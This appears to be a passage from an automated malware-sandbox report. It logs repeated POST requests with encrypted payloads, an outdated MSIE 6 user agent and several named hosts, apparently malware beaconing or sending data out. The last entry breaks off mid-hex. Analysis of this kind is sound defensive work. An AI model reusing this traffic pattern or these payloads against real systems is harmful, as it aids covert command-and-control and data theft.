4YSB52HvwBDmWA4EwMEUVjoO7cBffButJdQazqLFDA7MYdzOV3psrKABW6j8jIBfAa9IvjkpbrqBuMtWO0i5eYshSjcpcMsMbbXbtoD7i8ZyTHAdSH2Tntrf+4yqk3XWwku/G+u4GDpRTmxzEV8R9qczPJAI0qUBJRx5YkcxjXCHe6TCZGIVEsd862P6IZA23FvEzEqWzDQP0QjtUwnMcxBzrhYL+dgJCt07V60/xgfxamMA5BlAsgQbeXFBk9BFVZsZw2eQCjcBoKvAKEDqF9JjTd/GBQK9zAYVRNyIgArOMgPk7vcMg5mXex1SIRS38jJCSE4tR/7ybgFjAndieSwCZhn4NZum0TmD9nOeXaIFaH4t3iRNa4ge/gNG8Cp9n5YJMABB49+8uWPkuYToUICchGgPNJqHiTq9TjRYOHZKg18UmPiS6lAMfEpnvhcJq1BVITLYVMLzYBuwI7Vxit9ymisNvu3MR0Gbd7wYBwl3nO5oG1lQXWE9U1lhhVTeU7QE+2kF22FQJQauYKWac6wHICUzHDN9nSM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 71 72 4d 30 58 57 41 68 74 42 42 33 4f 78 6c 46 73 2b 56 41 48 5a 4f 7a 4f 50 66 49 53 31 4b 34 6c 48 35 39 30 53 65 50 51 53 58 77 36 42 4b 5a 57 55 4a 6a 63 77 33 41 70 66 33 2b 37 71 6c 61 61 6a 47 2f 34 30 48 38 51 71 5a 68 41 49 4c 4d 78 76 58 46 37 34 7a 44 50 4e 38 51 78 6b 34 2f 58 4d 44 37 39 39 61 30 38 6f 36 79 65 35 6b 36 54 4e 76 2f 62 65 49 76 62 75 59 41 68 4d 38 79 5a 75 62 35 4f 64 4e 4b 69 34 4f 77 52 6b 50 45 73 64 43 4d 73 4f 64 56 55 49 43 61 4b 64 35 41 6e 56 32 37 64 30 68 61 4a 38 4f 6f 4c 34 39 6b 33 53 50 33 58 7a 4a 5a 4d 68 68 35 74 76 6f 45 6e 36 47 62 67 4d 30 77 53 57 50 61 68 34 4c 54 6a 72 66 7a 61 57 54 57 6a 79 59 54 63 74 43 39 4d 30 6d 6d 77 6f 76 62 47 52 61 31 49 4c 32 39 6f 4d 64 38 48 54 74 73 33 33 64 32 59 77 37 77 4a 58 78 4d 6d 34 6c 4e 65 6e 39 68 4c 58 72 6b 35 7a 68 78 57 5a 4b 32 4e 72 71 57 2b 49 4f 79 6a 66 65 66 4d 64 67 32 58 41 47 79 75 6e 7a 6c 4d 68 57 52 42 42 58 57 5a 57 6b 77 65 36 7a 66 51 59 65 37 2f 77 68 4c 76 42 44 67 66 37 69 30 47 43 58 2b 4a 32 70 62 64 58 68 35 6a 71 57 7a 2b 6b 52 77 52 51 47 4c 72 71 4f 67 4f 73 49 4b 39 64 58 42 49 6a 50 72 38 69 34 58 55 41 78 6c 61 32 75 50 30 6c 4f 2b 42 72 5a 38 75 74 7a 38 62 77 7a 6e 67 76 34 4c 2f 55 6c 2b 76 6a 6d 74 36 59 4a 36 52 34 57 65 6b 34 30 45 6e 2f 4f 48 41 72 79 74 71 77 2f 6e 72 74 55 61 79 31 33 72 62 49 51 35 31 6c 4e 41 6a 52 68 6e 5a 55 6d 32 4d 47 31 74 32 53 6c 53 57 76 33 72 6a 72 53 38 42 65 50 6d 44 63 37 70 68 61 56 47 34 79 4a 4b 49 5a 75 33 47 42 58 32 61 72 41 72 63 6d 6f 45 68 4b 6e 4b 32 69 2b 63 2b 55 5a 76 6d 79 43 42 77 69 38 3d Data Ascii: qrM0XWAhtBB3OxlFs+VAHZOzOPfIS1K4lH590SePQSXw6BKZWUJjcw3Apf3+7qlaajG/40H8QqZhAILMxvXF74zDPN8Qxk4/XMD799a08o6ye5k6TNv/beIvbuYAhM8yZub5OdNKi4OwRkPEsdCMsOdVUICaKd5AnV27d0haJ8OoL49k3SP3XzJZMhh5tvoEn6GbgM0wSWPah4LTjrfzaWTWjyYTctC9M0mmwovbGRa1IL29oMd8HTts33d2Yw7wJXxMm4lNen9hLXrk5zhxWZK2NrqW+IOyjfefMdg2XAGyunzlMhWRBBXWZWkwe6zfQYe7/whLvBDgf7i0GCX+J2pbdXh5jqWz+kRwRQGLrqOgOsIK9dXBIjPr8i4XUAxla2uP0lO+BrZ8utz8bwzngv4L/Ul+vjmt6YJ6R4Wek40En/OHArytqw/nrtUay13rbIQ51lNAjRhnZUm2MG1t2SlSWv3rjrS8BePmDc7phaVG4yJKIZu3GBX2arArcmoEhKnK2i+c+UZvmyCBwi8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 34 59 53 42 35 32 48 76 77 42 44 6d 57 41 34 45 77 4d 45 55 56 6a 6f 4f 37 63 42 66 66 42 75 74 4a 64 51 61 7a 71 4c 46 44 41 37 4d 59 64 7a 4f 56 33 70 73 72 4b 41 42 57 36 6a 38 6a 49 42 66 41 61 39 49 76 6a 6b 70 62 72 71 42 75 4d 74 57 4f 30 69 35 65 59 73 68 53 6a 63 70 63 4d 73 4d 62 62 58 62 74 6f 44 37 69 38 5a 79 54 48 41 64 53 48 32 54 6e 74 72 66 2b 34 79 71 6b 33 58 57 77 6b 75 2f 47 2b 75 34 47 44 70 52 54 6d 78 7a 45 56 38 52 39 71 63 7a 50 4a 41 49 30 71 55 42 4a 52 78 35 59 6b 63 78 6a 58 43 48 65 36 54 43 5a 47 49 56 45 73 64 38 36 32 50 36 49 5a 41 32 33 46 76 45 7a 45 71 57 7a 44 51 50 30 51 6a 74 55 77 6e 4d 63 78 42 7a 72 68 59 4c 2b 64 67 4a 43 74 30 37 56 36 30 2f 78 67 66 78 61 6d 4d 41 35 42 6c 41 73 67 51 62 65 58 46 42 6b 39 42 46 56 5a 73 5a 77 32 65 51 43 6a 63 42 6f 4b 76 41 4b 45 44 71 46 39 4a 6a 54 64 2f 47 42 51 4b 39 7a 41 59 56 52 4e 79 49 67 41 72 4f 4d 67 50 6b 37 76 63 4d 67 35 6d 58 65 78 31 53 49 52 53 33 38 6a 4a 43 53 45 34 74 52 2f 37 79 62 67 46 6a 41 6e 64 69 65 53 77 43 5a 68 6e 34 4e 5a 75 6d 30 54 6d 44 39 6e 4f 65 58 61 49 46 61 48 34 74 33 69 52 4e 61 34 67 65 2f 67 4e 47 38 43 70 39 6e 35 59 4a 4d 41 42 42 34 39 2b 38 75 57 50 6b 75 59 54 6f 55 49 43 63 68 47 67 50 4e 4a 71 48 69 54 71 39 54 6a 52 59 4f 48 5a 4b 67 31 38 55 6d 50 69 53 36 6c 41 4d 66 45 70 6e 76 68 63 4a 71 31 42 56 49 54 4c 59 56 4d 4c 7a 59 42 75 77 49 37 56 78 69 74 39 79 6d 69 73 4e 76 75 33 4d 52 30 47 62 64 37 77 59 42 77 6c 33 6e 4f 35 6f 47 31 6c 51 58 57 45 39 55 31 6c 68 68 56 54 65 55 37 51 45 2b 32 6b 46 32 32 46 51 4a 51 61 75 59 4b 57 61 63 36 77 48 49 43 55 7a 48 44 4e 39 6e 53 4d 3d Data Ascii: 4YSB52HvwBDmWA4EwMEUVjoO7cBffButJdQazqLFDA7MYdzOV3psrKABW6j8jIBfAa9IvjkpbrqBuMtWO0i5eYshSjcpcMsMbbXbtoD7i8ZyTHAdSH2Tntrf+4yqk3XWwku/G+u4GDpRTmxzEV8R9qczPJAI0qUBJRx5YkcxjXCHe6TCZGIVEsd862P6IZA23FvEzEqWzDQP0QjtUwnMcxBzrhYL+dgJCt07V60/xgfxamMA5BlAsgQbeXFBk9BFVZsZw2eQCjcBoKvAKEDqF9JjTd/GBQK9zAYVRNyIgArOMgPk7vcMg5mXex1SIRS38jJCSE4tR/7ybgFjAndieSwCZhn4NZum0TmD9nOeXaIFaH4t3iRNa4ge/gNG8Cp9n5YJMABB49+8uWPkuYToUICchGgPNJqHiTq9TjRYOHZKg18UmPiS6lAMfEpnvhcJq1BVITLYVMLzYBuwI7Vxit9ymisNvu3MR0Gbd7wYBwl3nO5oG1lQXWE9U1lhhVTeU7QE+2kF22FQJQauYKWac6wHICUzHDN9nSM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 46 35 4a 39 43 34 41 61 77 68 41 39 45 74 42 6f 55 30 74 5a 41 37 4f 6c 2b 57 52 6f 43 30 38 32 74 48 46 54 56 5a 79 59 68 57 54 48 49 43 52 53 43 51 62 37 57 53 69 4c 35 4e 65 48 68 54 4b 47 5a 39 50 55 44 72 47 4c 4a 45 55 41 2f 64 71 36 38 77 53 6e 4d 52 69 41 75 36 52 51 59 57 4d 69 72 45 6b 43 53 67 75 59 75 50 6b 34 4c 73 7a 2b 45 70 46 72 4a 37 49 7a 4f 43 55 6b 48 33 72 30 38 7a 73 4e 56 74 6d 57 4b 72 72 6f 6f 59 33 58 4f 66 48 79 4b 45 70 38 6e 69 4c 7a 2f 52 39 39 6e 2b 71 63 4b 77 71 6b 73 37 56 64 69 55 36 4f 6a 69 4f 62 4a 59 61 61 7a 49 4e 2f 42 52 44 67 66 53 70 56 44 44 31 4e 78 4b 51 4a 6a 35 77 6f 39 31 54 35 69 67 34 57 5a 33 61 36 72 69 4b 48 33 33 64 47 35 34 45 2f 47 78 32 4c 43 69 75 68 69 56 65 64 30 61 58 56 59 6c 56 49 72 65 4c 2f 6d 68 43 2f 46 69 59 56 73 7a 50 53 49 4a 54 4b 72 65 61 74 6c 36 31 6f 46 6f 34 2f 65 4d 46 61 51 2f 61 52 5a 7a 34 50 36 6f 4d 6b 39 63 33 6a 39 67 76 72 45 2b 67 55 54 49 67 5a 4e 64 6a 4e 76 4e 30 61 53 73 51 2f 64 4f 4c 76 69 46 36 56 75 59 35 49 56 36 66 32 6d 4b 39 48 6f 54 68 59 39 62 36 4b 51 76 42 51 2f 31 6b 62 4b 57 72 70 6f 70 43 48 54 76 39 4d 59 37 30 30 50 7a 6b 61 38 47 42 75 65 57 57 33 75 72 34 76 48 6c 32 67 38 70 6b 64 4a 73 49 4d 38 64 2b 4c 31 6a 6b 68 5a 67 2b 78 67 38 72 50 61 62 44 68 72 4b 35 65 4b 79 67 41 4f 71 75 4b 44 59 6f 52 73 63 76 38 44 6b 67 39 67 63 76 34 37 69 38 6f 6a 62 44 74 67 53 70 35 4f 34 2b 57 2f 38 59 46 38 31 61 43 59 52 79 39 66 37 37 6f 4a 59 70 34 73 48 46 44 37 39 56 62 6b 68 4a 30 4a 4c 67 62 39 51 4d 4d 63 43 47 66 2f 53 45 54 61 31 5a 44 37 6c 42 37 32 6e 79 75 4e 77 4e 63 69 6b 30 44 54 36 49 4e 37 4d 50 73 43 4c 75 55 73 31 45 77 74 41 4b 65 68 63 55 6c 47 46 49 47 74 58 6f 6e 51 37 34 41 39 76 72 45 59 67 3d 3d Data Ascii: F5J9C4AawhA9EtBoU0tZA7Ol+WRoC082tHFTVZyYhWTHICRSCQb7WSiL5NeHhTKGZ9PUDrGLJEUA/dq68wSnMRiAu6RQYWMirEkCSguYuPk4Lsz+EpFrJ7IzOCUkH3r08zsNVtmWKrrooY3XOfHyKEp8niLz/R99n+qcKwqks7VdiU6OjiObJYaazIN/BRDgfSpVDD1NxKQJj5wo91T5ig4WZ3a6riKH33dG54E/Gx2LCiuhiVed0aXVYlVIreL/mhC/FiYVszPSIJTKreatl61oFo4/eMFaQ/aRZz4P6oMk9c3j9gvrE+gUTIgZNdjNvN0aSsQ/dOLviF6VuY5IV6f2mK9HoThY9b6KQvBQ/1kbKWrpopCHTv9MY700Pzka8GBueWW3ur4vHl2g8pkdJsIM8d+L1jkhZg+xg8rPabDhrK5eKygAOquKDYoRscv8Dkg9gcv47i8ojbDtgSp5O4+W/8YF81aCYRy9f77oJYp4sHFD79VbkhJ0JLgb9QMMcCGf/SETa1ZD7lB72nyuNwNcik0DT6IN7MPsCLuUs1EwtAKehcUlGFIGtXonQ74A9vrEYg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 66 62 55 33 58 58 67 68 74 42 44 49 4b 70 67 6a 2b 33 61 69 48 32 74 6a 67 53 54 41 53 53 73 6e 4c 44 54 72 74 4a 69 50 76 6d 76 69 44 77 79 31 6b 53 67 6a 75 4a 31 4d 75 6c 6e 36 47 78 38 70 77 39 32 70 63 4f 69 78 6a 58 45 5a 6e 4d 63 77 30 64 52 46 78 62 67 36 75 38 68 4b 35 79 4a 61 44 65 6d 70 46 6c 39 5a 53 79 33 44 76 36 47 46 76 41 4a 51 34 54 4e 38 32 61 33 6c 6d 61 68 57 33 6a 5a 53 48 72 69 4c 46 43 59 31 42 77 77 57 56 33 6c 50 57 43 53 4f 42 52 42 6a 79 62 61 62 66 4a 52 4a 4c 70 37 6d 49 77 6e 79 66 37 66 6c 42 42 59 43 59 52 54 4b 45 67 71 37 6d 44 56 78 6c 48 4a 6b 55 6a 77 63 53 6c 37 68 49 5a 34 66 68 55 63 36 6c 50 43 7a 37 41 32 34 6e 51 61 71 53 38 63 53 31 73 39 79 4a 39 58 7a 45 70 73 56 45 32 38 58 73 63 30 38 44 2b 43 69 51 4b 43 32 39 61 53 76 71 75 43 57 67 64 7a 68 77 69 2f 65 58 67 57 74 61 66 61 76 70 73 74 69 34 59 52 6d 58 45 66 7a 66 7a 67 51 6d 59 51 67 63 78 50 65 39 74 47 72 2f 44 45 72 2f 64 74 63 31 6a 4a 56 44 45 46 57 38 55 39 62 4f 35 70 39 39 50 56 32 68 51 4f 55 2f 30 44 36 2f 6a 43 77 5a 6d 6a 63 6a 47 46 44 52 39 36 47 72 46 42 5a 46 7a 74 42 47 4b 6e 69 61 62 30 43 6d 2b 44 47 45 30 72 45 4d 2f 4c 75 6a 45 46 48 6a 73 4e 36 4a 58 44 33 6d 4a 6b 4e 4f 44 75 61 66 46 5a 48 41 33 51 44 6e 4e 39 58 65 77 6d 44 53 39 49 44 4c 34 51 4f 65 46 37 62 47 31 36 59 4e 31 2b 45 42 2f 58 54 70 5a 52 58 52 48 6f 59 6a 50 4a 41 6a 77 67 66 49 4d 41 77 36 7a 50 75 4e 37 6e 4f 6c 2b 70 77 39 56 4a 75 47 74 37 5a 6f 6d 2b 54 72 6d 52 56 6a 53 4b 73 33 58 45 74 2b 39 7a 73 46 47 65 78 6d 75 4f 56 47 4e 59 6e 6f 77 72 39 2b 59 4f 42 39 70 7a 62 32 67 4c 33 61 6d 39 4d 31 32 50 32 48 50 74 2b 51 5a 4a 6d 50 6f 4e 53 2f 6a 37 49 36 65 2f 48 4e 77 3d 3d Data Ascii: fbU3XXghtBDIKpgj+3aiH2tjgSTASSsnLDTrtJiPvmviDwy1kSgjuJ1Muln6Gx8pw92pcOixjXEZnMcw0dRFxbg6u8hK5yJaDempFl9ZSy3Dv6GFvAJQ4TN82a3lmahW3jZSHriLFCY1BwwWV3lPWCSOBRBjybabfJRJLp7mIwnyf7flBBYCYRTKEgq7mDVxlHJkUjwcSl7hIZ4fhUc6lPCz7A24nQaqS8cS1s9yJ9XzEpsVE28Xsc08D+CiQKC29aSvquCWgdzhwi/eXgWtafavpsti4YRmXEfzfzgQmYQgcxPe9tGr/DEr/dtc1jJVDEFW8U9bO5p99PV2hQOU/0D6/jCwZmjcjGFDR96GrFBZFztBGKniab0Cm+DGE0rEM/LujEFHjsN6JXD3mJkNODuafFZHA3QDnN9XewmDS9IDL4QOeF7bG16YN1+EB/XTpZRXRHoYjPJAjwgfIMAw6zPuN7nOl+pw9VJuGt7Zom+TrmRVjSKs3XEt+9zsFGexmuOVGNYnowr9+YOB9pzb2gL3am9M12P2HPt+QZJmPoNS/j7I6e/HNw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 4d 2f 53 64 30 49 74 39 46 67 36 39 71 63 4e 58 34 72 55 72 4c 50 54 2f 72 70 7a 52 48 6d 36 33 37 33 2b 78 4b 74 4a 63 6b 4c 38 50 55 78 4a 43 79 47 33 70 74 61 36 53 78 4f 59 64 72 53 51 32 69 79 77 6d 4b 7a 39 36 6a 78 4c 4d 67 49 4e 36 4f 56 41 6d 77 62 36 71 48 50 55 31 39 57 7a 58 42 47 62 6f 36 75 4a 75 75 68 45 76 41 78 5a 63 41 79 2b 78 4b 4c 35 2f 4f 37 5a 48 65 54 6a 71 78 72 56 4f 44 2b 50 64 30 32 45 67 59 48 50 4f 2b 38 4d 4d 38 63 34 54 70 6d 32 44 2b 73 75 6f 4f 51 4a 68 77 47 33 77 54 42 6c 55 6f 59 56 6f 6c 6f 6c 42 6e 54 42 46 34 33 58 6d 66 36 52 6c 38 6c 76 44 2b 58 35 79 4a 4b 79 58 57 5a 6c 78 6b 70 63 35 52 68 65 68 52 74 2b 7a 4d 6b 6d 6c 54 5a 30 63 39 6a 77 71 39 46 35 46 52 4f 62 6e 4d 46 69 38 52 4d 38 7a 4c 64 57 58 5a 4f 65 6a 65 41 6c 30 39 45 63 4d 33 4c 54 4a 65 6a 39 74 62 2f 52 2f 6c 32 46 57 61 39 43 49 4f 53 32 30 4a 69 66 62 7a 6e 34 43 38 78 78 6f 76 77 66 44 6e 37 70 6f 54 66 7a 34 58 63 51 4d 49 50 70 5a 74 46 7a 4f 38 58 68 57 31 49 64 30 57 61 78 4c 7a 63 4d 2b 30 32 42 71 43 54 63 46 45 78 5a 68 37 52 44 71 41 61 4a 61 36 47 4d 59 37 61 77 56 70 6d 41 54 39 61 36 74 77 4e 62 78 70 67 67 2f 44 34 58 79 6e 54 6f 47 70 46 65 55 68 61 49 45 56 38 70 69 39 46 77 6f 75 6f 5a 6e 39 44 58 63 6c 73 66 56 6c 4f 48 52 71 7a 61 6f 77 49 58 58 75 41 75 62 2f 61 61 76 39 6a 53 48 4c 51 55 73 35 73 74 69 72 79 77 64 41 58 75 53 71 61 42 73 54 75 69 66 31 46 46 68 47 6b 74 6c 33 79 4d 75 41 55 32 57 4b 74 34 59 45 6b 79 54 74 57 53 48 7a 54 57 6b 4f 45 77 46 43 58 6b 45 6f 42 35 4e 54 36 52 30 47 6f 63 4c 61 47 30 79 51 6d 51 65 62 58 66 48 62 7a 48 37 67 34 55 51 37 51 55 56 6e 62 35 30 6b 46 65 6d Data Ascii: M/Sd0It9Fg69qcNX4rUrLPT/rpzRHm6373+xKtJckL8PUxJCyG3pta6SxOYdrSQ2iywmKz96jxLMgIN6OVAmwb6qHPU19WzXBGbo6uJuuhEvAxZcAy+xKL5/O7ZHeTjqxrVOD+Pd02EgYHPO+8MM8c4Tpm2D+suoOQJhwG3wTBlUoYVololBnTBF43Xmf6Rl8lvD+X5yJKyXWZlxkpc5RhehRt+zMkmlTZ0c9jwq9F5FRObnMFi8RM8zLdWXZOejeAl09EcM3LTJej9tb/R/l2FWa9CIOS20Jifbzn4C8xxovwfDn7poTfz4XcQMIPpZtFzO8XhW1Id0WaxLzcM+02BqCTcFExZh7RDqAaJa6GMY7awVpmAT9a6twNbxpgg/D4XynToGpFeUhaIEV8pi9FwouoZn9DXclsfVlOHRqzaowIXXuAub/aav9jSHLQUs5stirywdAXuSqaBsTuif1FFhGktl3yMuAU2WKt4YEkyTtWSHzTWkOEwFCXkEoB5NT6R0GocLaG0yQmQebXfHbzH7g4UQ7QUVnb50kFem
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 41 50 65 6a 62 31 61 72 7a 52 42 52 6d 2b 37 67 4d 65 71 4b 78 50 6b 75 65 58 33 32 59 37 6c 48 36 6c 79 33 78 6e 32 30 47 37 76 46 37 55 67 76 2f 6e 44 71 53 53 4f 37 48 65 37 72 37 31 58 7a 38 74 78 43 66 51 4b 4c 30 4e 4f 58 6c 6f 64 6b 73 6c 4b 73 45 34 39 6a 70 6b 52 67 51 6d 47 65 78 72 59 4c 66 4b 4d 7a 4c 34 2b 71 66 30 48 6f 6a 34 52 38 4c 77 71 4d 79 6d 71 46 59 67 67 74 57 7a 2f 48 71 47 37 79 6a 70 6f 35 41 4b 59 4a 55 2b 68 7a 4b 6c 30 6c 44 41 2f 57 49 6d 30 61 6e 39 74 67 48 76 6c 58 45 53 72 50 49 56 4f 56 5a 51 42 55 37 39 36 57 70 7a 36 4e 49 75 4f 36 66 6a 44 61 78 37 33 54 36 51 6e 65 69 4a 39 59 41 55 33 47 46 35 64 32 67 58 54 67 2b 6e 38 61 4c 47 50 4f 36 4f 71 63 35 2b 33 76 35 34 6f 58 6c 70 49 51 71 57 67 6f 4c 63 61 4f 72 68 58 53 32 62 4a 6a 2b 37 5a 76 6d 66 2b 55 75 57 70 38 74 4a 75 4e 6d 43 33 61 70 72 69 71 61 65 4b 65 71 63 56 62 4e 63 79 4f 67 45 33 54 50 71 47 2b 42 58 6e 31 56 64 6d 79 5a 65 41 58 39 33 55 53 4d 41 58 63 74 30 48 38 62 38 51 32 73 6d 64 46 31 6a 70 51 32 59 4c 56 4f 62 4c 34 76 58 48 4f 51 54 49 52 4d 6e 6f 32 2b 7a 56 61 6a 56 4b 69 49 4e 32 35 41 63 4c 4b 2f 4e 65 71 76 6e 75 68 66 4e 6a 35 39 4b 41 63 37 64 37 37 73 75 67 2b 6d 63 6b 68 78 67 50 48 52 64 44 6c 74 54 4c 73 76 4d 64 67 52 46 71 4e 32 79 72 4c 33 57 2f 6b 43 47 53 48 63 57 74 4c 79 53 39 75 37 68 48 36 69 34 42 41 62 46 6e 67 42 75 54 39 32 6b 52 37 4f 4d 72 71 6a 75 37 6a 32 65 42 66 51 33 33 73 62 57 43 39 55 31 79 51 2f 61 41 6b 6d 41 70 76 5a 2f 55 34 66 76 66 69 47 33 33 39 79 35 30 62 71 42 78 49 34 64 43 6f 53 6c 52 48 36 47 53 64 6b 47 71 52 2b 71 55 45 67 57 57 45 77 6c 65 56 43 2f 4d 33 55 61 55 6c 78 4e 74 66 57 51 36 43 2b 36 37 55 78 43 62 51 4d 66 33 38 45 4d 7a 4c 7a 41 3d 3d Data Ascii: APejb1arzRBRm+7gMeqKxPkueX32Y7lH6ly3xn20G7vF7Ugv/nDqSSO7He7r71Xz8txCfQKL0NOXlodkslKsE49jpkRgQmGexrYLfKMzL4+qf0Hoj4R8LwqMymqFYggtWz/HqG7yjpo5AKYJU+hzKl0lDA/WIm0an9tgHvlXESrPIVOVZQBU796Wpz6NIuO6fjDax73T6QneiJ9YAU3GF5d2gXTg+n8aLGPO6Oqc5+3v54oXlpIQqWgoLcaOrhXS2bJj+7Zvmf+UuWp8tJuNmC3apriqaeKeqcVbNcyOgE3TPqG+BXn1VdmyZeAX93USMAXct0H8b8Q2smdF1jpQ2YLVObL4vXHOQTIRMno2+zVajVKiIN25AcLK/NeqvnuhfNj59KAc7d77sug+mckhxgPHRdDltTLsvMdgRFqN2yrL3W/kCGSHcWtLyS9u7hH6i4BAbFngBuT92kR7OMrqju7j2eBfQ33sbWC9U1yQ/aAkmApvZ/U4fvfiG339y50bqBxI4dCoSlRH6GSdkGqR+qUEgWWEwleVC/M3UaUlxNtfWQ6C+67UxCbQMf38EMzLzA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 41 50 65 6a 62 31 61 72 7a 52 42 52 6d 2b 37 67 4d 65 71 4b 78 50 6b 75 65 58 33 32 59 37 6c 48 36 6c 79 33 78 6e 32 30 47 37 76 46 37 55 67 76 2f 6e 44 71 53 53 4f 37 48 65 37 72 37 31 58 7a 38 74 78 43 66 51 4b 4c 30 4e 4f 58 6c 6f 64 6b 73 6c 4b 73 45 34 39 6a 70 6b 52 67 51 6d 47 65 78 72 59 4c 66 4b 4d 7a 4c 34 2b 71 66 30 48 6f 6a 34 52 38 4c 77 71 4d 79 6d 71 46 59 67 67 74 57 7a 2f 48 71 47 37 79 6a 70 6f 35 41 4b 59 4a 55 2b 68 7a 4b 6c 30 6c 44 41 2f 57 49 6d 30 61 6e 39 74 67 48 76 6c 58 45 53 72 50 49 56 4f 56 5a 51 42 55 37 39 36 57 70 7a 36 4e 49 75 4f 36 66 6a 44 61 78 37 33 54 36 51 6e 65 69 4a 39 59 41 55 33 47 46 35 64 32 67 58 54 67 2b 6e 38 61 4c 47 50 4f 36 4f 71 63 35 2b 33 76 35 34 6f 58 6c 70 49 51 71 57 67 6f 4c 63 61 4f 72 68 58 53 32 62 4a 6a 2b 37 5a 76 6d 66 2b 55 75 57 70 38 74 4a 75 4e 6d 43 33 61 70 72 69 71 61 65 4b 65 71 63 56 62 4e 63 79 4f 67 45 33 54 50 71 47 2b 42 58 6e 31 56 64 6d 79 5a 65 41 58 39 33 55 53 4d 41 58 63 74 30 48 38 62 38 51 32 73 6d 64 46 31 6a 70 51 32 59 4c 56 4f 62 4c 34 76 58 48 4f 51 54 49 52 4d 6e 6f 32 2b 7a 56 61 6a 56 4b 69 49 4e 32 35 41 63 4c 4b 2f 4e 65 71 76 6e 75 68 66 4e 6a 35 39 4b 41 63 37 64 37 37 73 75 67 2b 6d 63 6b 68 78 67 50 48 52 64 44 6c 74 54 4c 73 76 4d 64 67 52 46 71 4e 32 79 72 4c 33 57 2f 6b 43 47 53 48 63 57 74 4c 79 53 39 75 37 68 48 36 69 34 42 41 62 46 6e 67 42 75 54 39 32 6b 52 37 4f 4d 72 71 6a 75 37 6a 32 65 42 66 51 33 33 73 62 57 43 39 55 31 79 51 2f 61 41 6b 6d 41 70 76 5a 2f 55 34 66 76 66 69 47 33 33 39 79 35 30 62 71 42 78 49 34 64 43 6f 53 6c 52 48 36 47 53 64 6b 47 71 52 2b 71 55 45 67 57 57 45 77 6c 65 56 43 2f 4d 33 55 61 55 6c 78 4e 74 66 57 51 36 43 2b 36 37 55 78 43 62 51 4d 66 33 38 45 4d 7a 4c 7a 41 3d 3d Data Ascii: APejb1arzRBRm+7gMeqKxPkueX32Y7lH6ly3xn20G7vF7Ugv/nDqSSO7He7r71Xz8txCfQKL0NOXlodkslKsE49jpkRgQmGexrYLfKMzL4+qf0Hoj4R8LwqMymqFYggtWz/HqG7yjpo5AKYJU+hzKl0lDA/WIm0an9tgHvlXESrPIVOVZQBU796Wpz6NIuO6fjDax73T6QneiJ9YAU3GF5d2gXTg+n8aLGPO6Oqc5+3v54oXlpIQqWgoLcaOrhXS2bJj+7Zvmf+UuWp8tJuNmC3apriqaeKeqcVbNcyOgE3TPqG+BXn1VdmyZeAX93USMAXct0H8b8Q2smdF1jpQ2YLVObL4vXHOQTIRMno2+zVajVKiIN25AcLK/NeqvnuhfNj59KAc7d77sug+mckhxgPHRdDltTLsvMdgRFqN2yrL3W/kCGSHcWtLyS9u7hH6i4BAbFngBuT92kR7OMrqju7j2eBfQ33sbWC9U1yQ/aAkmApvZ/U4fvfiG339y50bqBxI4dCoSlRH6GSdkGqR+qUEgWWEwleVC/M3UaUlxNtfWQ6C+67UxCbQMf38EMzLzA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 30 6f 6a 35 61 6e 59 70 35 39 63 7a 52 45 69 55 30 52 49 33 57 68 6e 79 6f 49 32 57 33 4a 7a 2f 43 75 30 58 53 76 43 57 4f 68 62 57 41 2f 43 65 45 2f 46 2b 52 37 67 4e 33 50 5a 38 55 6d 59 6b 76 7a 4f 44 51 31 2b 70 31 6c 42 77 39 54 39 79 53 39 69 7a 4c 36 63 77 67 46 35 73 77 32 78 64 79 4a 47 61 2f 33 6f 55 51 30 42 62 6a 37 37 57 6a 74 57 73 49 79 46 62 76 38 46 58 6f 4d 62 30 6c 4a 72 6f 54 38 59 67 41 58 79 43 67 54 7a 42 53 7a 58 45 6c 52 78 74 6d 79 6a 76 62 72 4c 75 71 58 56 58 38 6b 39 45 63 6c 6d 35 34 5a 64 73 4c 58 4c 6a 47 2b 74 34 45 45 64 61 35 33 45 34 69 52 75 42 72 7a 51 47 48 69 78 63 6b 41 2f 35 31 31 79 68 33 37 72 53 55 49 61 2f 61 37 2f 58 2f 33 4e 52 6e 43 5a 4a 64 36 74 35 31 2b 54 46 32 50 63 51 4b 52 37 37 64 4c 58 6b 43 74 58 31 5a 58 50 34 6e 72 4e 6e 4c 4d 4e 77 57 54 44 30 52 73 75 34 2f 69 78 71 6a 6a 51 67 58 4a 47 64 36 31 56 41 6b 4a 4b 5a 6a 44 6c 53 6d 4e 79 6e 37 32 4a 2f 6a 46 63 2f 44 30 47 43 73 43 65 